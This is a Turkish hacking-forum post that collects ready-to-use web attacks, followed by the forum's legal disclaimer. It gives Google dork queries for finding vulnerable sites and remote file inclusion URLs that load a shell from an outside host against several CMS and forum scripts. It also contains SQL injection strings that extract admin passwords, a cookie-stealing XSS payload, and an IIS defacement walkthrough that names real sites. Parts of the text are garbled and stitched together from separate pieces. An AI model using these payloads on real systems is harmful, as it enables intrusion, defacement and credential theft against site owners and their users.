Büyük Bir Hack Paylaşim Buyurun RFI AÇIKLARI

Köstebek-02

Yaşayan Forum Efsanesi
6 May 2008
15,580
45
Köstebek
Googlede arat :\"\"cms SunLight 5.2\"


https://tik.lat/PPnyC shell adresini at
https://tik.lat/9dJp0



Örnek Site
https://tik.lat/tnKpS
----------------------------------------------------------------------------


ewt arkdaslar yeni bir acik bundan arama yapar saniz site hackliye bilir isniz erken dawranan alir siteleri


google aramasi = \'xfsection\' \'modify.php\'

asagdaki ornege gore yapar siniz arkadaslar hadi kolay gelsin

https://tik.lat/dDma0 [ kendi shell linizi eklicek siniz )
-----------------------------------------------------------------------------------
Php-Fusion 6.0 Scriptinde Rfi açığı

Code:
/php-files/includes/phpmailer_include.php

Bu dosya şöyLe bir hata veriyor ;

include(şlang_path.’phpmailer.lang-’.şlang_type.’.php’);

Evet bunuda böyLe kullanabiliriz..

http://www.Sitead [url]https://tik.lat/kg77H
21-Eğer toplistinizi eklenti olarak kullanıyosanız ör: https://tik.lat/7EflL html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.
22- Gelelim eklentiden doğan xss açığına
Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.


Code:

********>
d o c u m e n t.write(\'<img src=\"http://host [url]https://tik.lat/pZymG [[Sh3LL Script]]

Exploit-2 : https://tik.lat/1edva [[Sh3LL Script]]

Exploit-3 : https://tik.lat/6mTBJ [[Sh3LL Script]]

----------------------------------------------------------
Asp Sistem Portal Hack ( Videolu )



Yine Kolay Bir Hack Yöntemi..Umarım Videoyu İzleyince Anlarsınız..Gerekli Kodlar Dosyanın içinde..

Not : Bu tür siteler Türk sitesi olduğu için zarar vermeyiniz sitelere..(uyarı amaçlı kullanın)

indirme adresi : https://tik.lat/dVsbq

Md5 Çözen Siteler ( Admin Şifresi Md5 Olarak Karşımıza Çıkcak Bu sİtelerden Faydalancaz Kırmak İçin )

------------------------------------------------
Güncel Açıkları Etkili Kullanabilme [Videolu]

Arkadaşlar sizler için video çektim BXCP = 0.3.0.4 team açığıyla exploitimizi çalıştırıcaz çok açık var.Exploit rar dosyasının içindedir.

indirme adresi : https://tik.lat/Jw3Bn

-----------------------------------------------------
ISS Açığı ile 4 Adımda İndex Basma!

DERS 1

%WINDIR%\\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
BU KOdları
başlat///çalıştır a yazın

DERS 2
Şimdi Web Klasörleri klasörü çıkacak.Klasörün herhangi bir yerinde mause’un sağ tuşuyla tıklayalım.Ardından \"Yeni\" sonrada \"Web klasörü\" diyelim.\"eklenecek konumu yazın\" yazan yerin altındaki boşluğa şu siteleri yazabiliriz.
color=#0000cccolor=#0000ffwww.acore.com.tw
color=#0000cccolor=#0000ffwww.autoalliance.co.th
color=#0000cccolor=#0000ffwww.cckln.edu.hk
color=#0000cccolor=#0000ffwww.cescage.com.br
color=#0000cccolor=#0000ffwww.driving-school.com.au
color=#0000cccolor=#0000ffwww.fy.ah163.net
color=#0000cccolor=#0000ffwww.gbks.com.tr
color=#0000cccolor=#0000ffwww.golfsenior.com.br
color=#0000cccolor=#0000ffwww.greencotton.co.th
color=#0000cccolor=#0000ffwww.intradenver.net
color=#0000cccolor=#0000ffwww.jwpension.com
color=#0000cccolor=#0000ffwww.lakelandboating.com
color=#0000cccolor=#0000ffwww.level.com
color=#0000cccolor=#0000ffwww.myworld.com.tr
color=#0000cccolor=#0000ffwww.radiolina.it
color=#0000cccolor=#0000ffwww.rallycomms.co.uk
color=#0000cccolor=#0000ffwww.socialistasenred.org
color=#0000cccolor=#0000ffwww.tgm.co.th
color=#0000cccolor=#0000ffwww.vfb-huels.de
tabi sadece bunları değil başka siteleri de yazabilirsiniz. bunlar bir örnektir. Neyse
Herhangi birini yazdıktan sonra ileri diyelim ardından son’a basalım.Yazdğımız site orda gözükecek.Sonra çift tıklayarak eklediğimiz siteye girelim.

DERS 3
şimdi bu ders index le ilgili kendi indexinizi frontpage veya başka bir şekilde yapın kaydetin. uzantısı html olsun şimdi. adım 4 teyiz arkadaşlar

DERS 4 VE SON
Şimdi Web Folders Klasörüne Dönelim.Eğer İçerisi bomboş ise index.html dosyamızın ismini isminiz.html yapalım (mesela nickimiz cesurgursel ise cesurgursel.html yapalım öyle yaparsak color=#0000cccolor=#0000ffwww.siteninadı.com/cesurgursel.html adresine girdiğimizde bizim hazırladığımız index dosyasını görürüz) ve Web Folders da açmış olduğumuz siteye sürükleyerek gönderelim.Eğer içerde dosya var ise index in ismi aynen kalsın siz sadece sürükle yöntemiyle yollayın.(dosyalar çıkarsa direk color=#0000cccolor=#0000ffwww.siteismi.com adresine girdiğimizde bizim dosyayı görürüz)
Burada ıss açığı ile iki dakika da index atamayı öğrendik çok kolay bir yoldur. direk linkte çıkar.
evet arkadaşlar ıss açığı olan tüm sitelerde işe yarar tamam. iyi hackler...

Lutfen bir tşk çok görmeyelim - Emeğe saygı

--------------------------------------------------------------

flashchat V4.5.7 açığı

Evet kaldıysa gelsin hacklesin bi dene


Google arama kodu : flashchat V4.5.7

/inc/cmses/aedating4CMS.php?dir[inc]=http://shell.com/c99.txt?


Sitelerin sonunda bulunan flashchat.php silin bu kodu ekleyin kolay gelsin

shell adresiniz vardır herhalde
huh.gif
cw

-------------------------------------------------------------------------------------
TROforum Scriptlerinde Uzaktan Kod Çağırma Güvenlik Açığı

Script : TROforum

Version : 0.1

Hasarlı kod : admin.php

Google Araması :\"TROforum 0.1\"


Saldırı şekli :

Örneksiteadresi/Script Yolu/admin/admin.php?site_url=http://sh3ladresiniz.txt?

--------------------------------------------------------------------------


phphtml v 0.6.4 Rfi


Website: https://tik.lat/AaNN4

DOWNLOAD: https://tik.lat/wsLw4

FILE :


Code:
PATH\\phphtml.phpEXPOLİT:


Code:
http://www.xxx.com\ [url]https://tik.lat/VbDPg

Introduction
============
\"Simple Machines Forum ? SMF in short ? is a free, professional grade software package
that allows you to set up your own online community within minutes.\" -from simplemachines.org

More Details
============
1. Session fixation:
The \"PHPSESSID\" parameter can be set to a malicious and arbitrary value.

1.1 Description:
In a session fixation attack, the attacker fixes the user\'s session ID before the user even logs into the target server.
After a user\'s session ID has been fixed, the attacker will wait for them to login.
Once the user does so, the attacker uses the predefined session ID value to assume their online identity.

Workaround:
============
1. Do not accept session identifiers from GET / POST variables.

2.Regenerate SID on each request.

3. Accept only server generated SID:
One way to improve security is to not accept session identifiers not generated by server.

if ( ! isset( ş_SESSION[\'SERVER_GENERATED_SID\'] ) ) {
session_destroy(); // destroy all data in session
}
session_regenerate_id(); // generate a new session identifier
ş_SESSION[\'SERVER_GENERATED_SID\'] = true;

History/Timeline
================
30.04.2007 discovery of the vulnerability
03.04.2007 contacted the vendor
04.04.2007 working patch sent to the vendor
05.04.2007 advisory is written
05.04.2007 advisory released
Not:Bu yazdıklarım sadece professionel kullanıcılar için gecerlidir

--------------------------------------------------------------------------------------------------------
bazı rfi açıkları

BinGo News <= 3.01 (bnrep)
Usage : https://tik.lat/DsaQ9 [Script Path]/bp_ncom.php?bnrep=http://SHELLURL.COM?

Arama kodu:BinGo News 3.01
Aramada kodu powered by BinGo News 3.01
inurl:bp_ncom.php

şeklinde çoğaltabilirsiniz.Umarım açıklayıcı olabilmişimdir;


Socketwiz Bookmarks <= 2.0 (root_dir)
Usage : http://[site [url]https://tik.lat/ZGC0x [path]/index.php?base=[shell] atau https://tik.lat/T5pII [path]/pop.php?base=[shell]

Somery <= 0.4.6 (skin_dir)
Usage : http://[domain]/ [url]https://tik.lat/f5tcw [path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]

PayProCart <= 1146078425 Multiple
Usage : /index.php?proMod=http://shell.txt?

Beautifier 0.1 (Core.php)
Usage : http://[Target]/ [url]https://tik.lat/L7rAG [Script Path]/bp_ncom.php?bnrep=http://SHELLURL.COM?

phpBB Shadow Premod <= 2.7.1
Usage : https://tik.lat/F0LBj [path]/includes/functions_portal.php?phpbb_root_path=[Evil_Script]

phpFullAnnu <= 5.1 (repmod)
Usage : https://tik.lat/sGWHa [Script Path]/modules/home.module.php?repmod=http://SHELLURL.COM?

Akarru <= 0.4.3.34 (bm_content)
Usage : https://tik.lat/dPRwm [path]/akarru.gui/main_content.php?bm_*********[she


---------------------------------------------------------------------------------------------------------

ASP Sitelerin DB\'lerin Indir / Kriptolu Şifreleri Bul !


Gerekli olanlar


Google arama kodu


Code:
allinurlroddetail.asp?prod=

Default mb yolu

fpdb/vsproducts.mdb


Admin girişi

vsadmin/login.asp

--------------------------------------------------------------------------------------------------------------


vBulletin 3.6.5 Scriptinde SQL Injection Güvenlik Açığı


Script : vBulletin

Version : 3.6.5

Saldırı şekli :


Code:
Hedefsite/Script Yolu/misc.php?sub=profile&name=0\\\\\\\\\\\\\')+UNION+S ELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_use rs%

------------------------------------------------------------------------------------------------------------


X-ice Haber Script\'i Admin K.Adı ve Şifresi Sql Enj. [Md5 Değil!]


- Site : ?

- Sql : devami.asp?id=-1%20union%20select%201,kullaniciadi,sifre,1,1,1,1, 1%20from%20admin

- Konu : X-ice Haber Script\'i Sql Enjeksiyon.

- Google araması : inurl:default.asp?Xsayfa=

- Admin Paneli : /admin



---------------------------------------------------------------------------------------------------------------------
Zen Cart Açığı [Garanti] Kendi Geliştirdiğim Arama Kodu

Normalde açık vardı fakat arama yapıldığında sitelerin az çıktığından.Yeni bi arama kodu gelistirdim.
Arama Kodu
Arama Kodu : \"Zen Cart!, The Art of E-commerce\" (\"\" lar yok)
Exploit:
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell adresi?

------------------------------------------------------------------------------------------------------------------


PHPBandManager Index.PHP RFİ Açığı.


Uzaktan: Yes Yerel: No Yayınlanması: Apr 26 2007 12:00AM Güncellemesi: Apr 26 2007 10:40PM Kim Buldu: koray Etkilenen: phpBandManager phpBandManager 0.8

Exploit:
https://tik.lat/vhdGZ

Kaynak: https://tik.lat/BAL5W

Google araması: https://tik.lat/pPdbK


örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın adresiniz/c.php?c=\'+********.cookie+\'\" WIDTH=0 HEIGHT=0>\');
allaha emanet olun babacanlar
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.